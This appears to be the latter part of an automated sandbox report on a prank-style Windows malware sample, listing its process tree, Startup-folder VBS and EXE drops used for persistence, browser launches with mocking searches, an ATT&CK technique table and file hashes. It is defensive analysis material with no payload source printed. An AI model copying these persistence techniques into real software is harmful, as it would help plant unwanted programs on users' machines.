"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
5⤵
PID:3624

C:\Windows\SysWOW64\timeout.exe
Timeout 5
4⤵
- Delays execution with timeout.exe
PID:224

C:\Windows\SysWOW64\mspaint.exe
mspaint
4⤵
- Suspicious use of SetWindowsHookEx
PID:1108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=FBI+OPEN+UP
4⤵
PID:3084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
5⤵
PID:4740

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=mcafee+vs+avast
4⤵
PID:3036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
5⤵
PID:1072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=smudge+the+cat
4⤵
PID:960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
5⤵
PID:2732

C:\Windows\SysWOW64\timeout.exe
Timeout 5
4⤵
- Delays execution with timeout.exe
PID:2464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+make+your+own+rickroll
4⤵
PID:4704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
5⤵
PID:1072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.thisworldthesedays.com/how-to-remove-acid-rainexe-step-by-step-guide.html
4⤵
PID:1380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
5⤵
PID:3684

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs"
4⤵
PID:4672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=is+safe+deleting+system32F
4⤵
PID:4704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
5⤵
PID:3704

C:\Windows\SysWOW64\timeout.exe
Timeout 5
4⤵
- Delays execution with timeout.exe
PID:960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/file/d/1TMp5UbzwcHprY7PhC9g58KsCN9EZVdBV/view
4⤵
PID:5316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
5⤵
PID:5328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+make+a+ransomware+in+batch
4⤵
PID:5372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
5⤵
PID:5392

C:\Windows\SysWOW64\timeout.exe
Timeout 5
4⤵
- Delays execution with timeout.exe
PID:5532

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hifjdnfejfnejnkdpamzm.vbs"
4⤵
PID:5688

C:\Windows\SysWOW64\timeout.exe
Timeout 55
4⤵
- Delays execution with timeout.exe
PID:5700

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4180

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:4208

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5272

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.Search_cw5n1h2txyewy
1⤵
PID:3892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1076

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2388

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Replication Through Removable Media

T1091

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\SETUPM~1\202209~1.PMA
Filesize
1KB

MD5
c04318faf0c800948603459b8a0f522e

SHA1
3aec68ec0dd3240ef6064a191875cd6aa8568ec5

SHA256
6335b24f5b264200c8f86a1351582f148ad4b6c253cc0430c01ac60112df81d7

SHA512
ff781d19280f918d3dc537963bbaf977afa149325c700f87c1f89b37b4a9982faae74b8062928aa67eb94cc72778e36b53468674ef05fd63802d280a11def64d

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge_elf.dll
Filesize
1.2MB

MD5
d2bddb1b48b3c5d0d35479662eab0f59

SHA1
62cfed69a68edbb156ce45e7425859ecf7d594a5

SHA256
9a7486d838a4ea36a4287593042cb16265fe1c6cb3baf8c1b5aa5e319df5f081

SHA512
44fde54e4b00dc2636c152d66928e3d2872e71e14ae733e18489950c1401cbfbd1fa8c69752b920167a7839e670b28137daaa4d9231fd789b6c3c78f20ee8f29

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Filesize
3.2MB

MD5
ad8536c7440638d40156e883ac25086e

SHA1
fa9e8b7fb10473a01b8925c4c5b0888924a1147c

SHA256
73d84d249f16b943d1d3f9dd9e516fadd323e70939c29b4a640693eb8818ee9a

SHA512
b5f368be8853aa142dba614dcca7e021aba92b337fe36cfc186714092a4dab1c7a2181954cd737923edd351149980182a090dbde91081c81d83f471ff18888fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
962644599f0c746e1b17a064c670d314

SHA1
73ccfa471325f9fe38767edab76fa81e95565eed

SHA256
12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

SHA512
cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
962644599f0c746e1b17a064c670d314

SHA1
73ccfa471325f9fe38767edab76fa81e95565eed

SHA256
12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

SHA512
cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
962644599f0c746e1b17a064c670d314

SHA1
73ccfa471325f9fe38767edab76fa81e95565eed

SHA256
12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

SHA512
cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
962644599f0c746e1b17a064c670d314

SHA1
73ccfa471325f9fe38767edab76fa81e95565eed

SHA256
12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

SHA512
cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
962644599f0c746e1b17a064c670d314

SHA1
73ccfa471325f9fe38767edab76fa81e95565eed

SHA256
12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

SHA512
cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
962644599f0c746e1b17a064c670d314

SHA1
73ccfa471325f9fe38767edab76fa81e95565eed

SHA256
12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

SHA512
cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
962644599f0c746e1b17a064c670d314

SHA1
73ccfa471325f9fe38767edab76fa81e95565eed

SHA256
12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

SHA512
cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
962644599f0c746e1b17a064c670d314

SHA1
73ccfa471325f9fe38767edab76fa81e95565eed

SHA256
12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

SHA512
cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
962644599f0c746e1b17a064c670d314

SHA1
73ccfa471325f9fe38767edab76fa81e95565eed

SHA256
12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

SHA512
cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
962644599f0c746e1b17a064c670d314

SHA1
73ccfa471325f9fe38767edab76fa81e95565eed

SHA256
12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

SHA512
cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
962644599f0c746e1b17a064c670d314

SHA1
73ccfa471325f9fe38767edab76fa81e95565eed

SHA256
12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

SHA512
cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\4CB8.tmp\Acid Rain.bat
Filesize
6KB

MD5
16a6fe0a61c21d85803c2b8383d5d3c2

SHA1
fec9adfac8c278c3dc548989a97c574ccdcb0934

SHA256
1942dd34f70465202360d5f299e7160cea4d108ac4305a94dbabd9b97f4b7bd0

SHA512
6dd03c5c69caf470584153e5e91ae074868e3002dcc76a07e1782c8d23fa8f309c09b0a50b787606be958f051ef0fdb67d24d0c91eee261549d6d60b857ce061

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe
Filesize
80KB

MD5
b3904e987387ac3ff87b2d16e3e28156

SHA1
d575167f14fc84625b1525e8a0dfa27c514b1357

SHA256
143bb189902ec44987f475f6fce4c0f90c072e5d732dae58b5f79a3c31b5f584

SHA512
a105063b598555d2b4c1a3950a7ac120ffc72ad362e6c76a364b48ff8c32e8daea48ef362b22aa62d848af1c20d3ef7c6536e717e874c6fad329ec0c22e9268f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe
Filesize
80KB

MD5
b3904e987387ac3ff87b2d16e3e28156

SHA1
d575167f14fc84625b1525e8a0dfa27c514b1357

SHA256
143bb189902ec44987f475f6fce4c0f90c072e5d732dae58b5f79a3c31b5f584

SHA512
a105063b598555d2b4c1a3950a7ac120ffc72ad362e6c76a364b48ff8c32e8daea48ef362b22aa62d848af1c20d3ef7c6536e717e874c6fad329ec0c22e9268f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe
Filesize
101KB

MD5
aacce8318a2e5f0a43c8cd50907d6d29

SHA1
fd5da11bbbcdb2421186626f461cb48fc634760c

SHA256
7217260d8d9c6b0b6c8b797f64c516d8ebe4db48dc8a5fced46eab9082378724

SHA512
8991368b7e5391b37c4584eedddfbb4041ddc554acad9742b390aad7b5b4791c106d1068b7c9c29cda9e14bd62e5c36894318246c247576162c54f30076190b5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe
Filesize
101KB

MD5
aacce8318a2e5f0a43c8cd50907d6d29

SHA1
fd5da11bbbcdb2421186626f461cb48fc634760c

SHA256
7217260d8d9c6b0b6c8b797f64c516d8ebe4db48dc8a5fced46eab9082378724

SHA512
8991368b7e5391b37c4584eedddfbb4041ddc554acad9742b390aad7b5b4791c106d1068b7c9c29cda9e14bd62e5c36894318246c247576162c54f30076190b5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hifjdnfejfnejnkdpamzm.vbs
Filesize
60B

MD5
70b06bab45636ed2ce89ffa1a56a2eda

SHA1
781043fb2a866fc38233be0b8beccd7fbeb0513d

SHA256
a9644355bc115a7a8fce8603643254f8061cce0e1af9db037b2bda9ca62f4fff

SHA512
a8a3d984b253e83c6ab4c4ad9b6ba773f69166204649be63d6850136523861e42132411d1fce3a83c4408f8051413101f5835136cecfad2b8022cc3489f004aa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs
Filesize
113B

MD5
076eec2d750fb2a85461d8b227b96124

SHA1
d1a6638bc96e6e3adf0ca3e3cb4c846f77e365d8

SHA256
a596e5753416572e877fe630002dc42afdbfa9ca80473e1385017b37e082a1a4

SHA512
5c6ff87335577061483cbf79333728085f198a4ee56fabab7d2fc401cbe8b146ee5ad174a6c1f5ba02095b186bb0f3729a5927b7fda4feeb6f5ae7411fa70ab5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sodnciwkms.vbs
Filesize
84B

MD5
139b5edf5ba8a4aa768281a29cac1649

SHA1
da8a2d689695a749288f161032e1f042122e89d5

SHA256
1dd686325c7471a59a43142c6d7dec01047b3e95147254b235fbc3652f923a7c

SHA512
ebf47fe1de3dca337a891330e7a97fbcf6c899a212be1c07f666d8d1179f116a70b4fcc66accfff3e3942ec83c79170882c8d48019feee0a02ffb57f66e61af8

Download Submit
C:\Windows\Debug\WIA\wiatrace.log
Filesize
1KB

MD5
06860547265933eb764e501f800fc612

SHA1
14953818abb171fd02938f7ee716599136bfc9b3

SHA256
097c456b0230fb248927161e10d62b7688f1730f58fed5f0d8b4ada37dc0bebb

SHA512
225fbc8ca3de89d8a6a8c10f1f8d13bc995a1675ce7f1af3adc1d010981d5c2e45fdc44d4742261375d503525cd93e7ed39820c9dec0344d70d1d9a3566f3f50

Download Submit
\??\pipe\LOCAL\crashpad_616_SHMJYVKGXGYTZGJU
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/100-216-0x0000000000000000-mapping.dmp

Download
memory/224-197-0x0000000000000000-mapping.dmp

Download
memory/616-141-0x0000000000000000-mapping.dmp

Download
memory/652-194-0x0000000000000000-mapping.dmp

Download
memory/672-139-0x0000000000000000-mapping.dmp

Download
memory/772-145-0x0000000000000000-mapping.dmp

Download
memory/960-211-0x0000000000000000-mapping.dmp

Download
memory/1072-207-0x0000000000000000-mapping.dmp

Download
memory/1072-220-0x0000000000000000-mapping.dmp

Download
memory/1076-264-0x0000023E27840000-0x0000023E27850000-memory.dmp

Filesize
64KB

Download
memory/1076-263-0x0000023E27830000-0x0000023E27840000-memory.dmp

Filesize
64KB

Download
memory/1076-248-0x0000023E27740000-0x0000023E27835000-memory.dmp

Filesize
980KB

Download
memory/1108-199-0x0000000000000000-mapping.dmp

Download
memory/1116-183-0x0000000000000000-mapping.dmp

Download
memory/1324-175-0x0000000000000000-mapping.dmp

Download
memory/1380-222-0x0000000000000000-mapping.dmp

Download
memory/1392-146-0x0000000000000000-mapping.dmp

Download
memory/1428-172-0x0000000000000000-mapping.dmp

Download
memory/1512-148-0x0000000000000000-mapping.dmp

Download
memory/1548-151-0x0000000000000000-mapping.dmp

Download
memory/1576-187-0x0000000000000000-mapping.dmp

Download
memory/1684-188-0x0000000000000000-mapping.dmp

Download
memory/1788-158-0x0000000000000000-mapping.dmp

Download
memory/1820-178-0x0000000000000000-mapping.dmp

Download
memory/1904-171-0x0000000000000000-mapping.dmp

Download
memory/2004-135-0x0000000000000000-mapping.dmp

Download
memory/2040-186-0x0000000000000000-mapping.dmp

Download
memory/2388-278-0x000001A820C40000-0x000001A820C60000-memory.dmp

Filesize
128KB

Download
memory/2388-271-0x000001A8208F0000-0x000001A820910000-memory.dmp

Filesize
128KB

Download
memory/2388-275-0x000001A8208B0000-0x000001A8208D0000-memory.dmp

Filesize
128KB

Download
memory/2464-213-0x0000000000000000-mapping.dmp

Download
memory/2496-196-0x0000000000000000-mapping.dmp

Download
memory/2636-162-0x0000000000000000-mapping.dmp

Download
memory/2732-212-0x0000000000000000-mapping.dmp

Download
memory/2756-149-0x0000000000000000-mapping.dmp

Download
memory/3036-204-0x0000000000000000-mapping.dmp

Download
memory/3084-200-0x0000000000000000-mapping.dmp

Download
memory/3172-150-0x0000000000000000-mapping.dmp

Download
memory/3404-230-0x0000000000000000-mapping.dmp

Download
memory/3432-210-0x0000000000000000-mapping.dmp

Download
memory/3500-177-0x0000000000000000-mapping.dmp

Download
memory/3560-152-0x0000000000000000-mapping.dmp

Download
memory/3620-142-0x0000000000000000-mapping.dmp

Download
memory/3624-191-0x0000000000000000-mapping.dmp

Download
memory/3648-218-0x0000000000000000-mapping.dmp

Download
memory/3684-224-0x0000000000000000-mapping.dmp

Download
memory/3816-164-0x0000000000000000-mapping.dmp

Download
memory/3836-143-0x0000000000000000-mapping.dmp

Download
memory/3956-170-0x0000000000000000-mapping.dmp

Download
memory/3968-173-0x0000000000000000-mapping.dmp

Download
memory/3972-181-0x0000000000000000-mapping.dmp

Download
memory/4060-185-0x0000000000000000-mapping.dmp

Download
memory/4160-166-0x0000000000000000-mapping.dmp

Download
memory/4348-144-0x0000000000000000-mapping.dmp

Download
memory/4480-138-0x0000000000000000-mapping.dmp

Download
memory/4500-190-0x0000000000000000-mapping.dmp

Download
memory/4504-147-0x0000000000000000-mapping.dmp

Download
memory/4536-154-0x0000000000000000-mapping.dmp

Download
memory/4560-206-0x0000000000000000-mapping.dmp

Download
memory/4672-225-0x0000000000000000-mapping.dmp

Download
memory/4692-228-0x0000000000000000-mapping.dmp

Download
memory/4704-231-0x0000000000000000-mapping.dmp

Download
memory/4704-219-0x0000000000000000-mapping.dmp

Download
memory/4724-155-0x0000000000000000-mapping.dmp

Download
memory/4740-201-0x0000000000000000-mapping.dmp

Download
memory/4760-168-0x0000000000000000-mapping.dmp

Download
memory/4864-132-0x0000000000000000-mapping.dmp

Download
memory/4936-176-0x0000000000000000-mapping.dmp

Download
memory/4996-160-0x0000000000000000-mapping.dmp

Download
memory/5024-198-0x0000000000000000-mapping.dmp

Download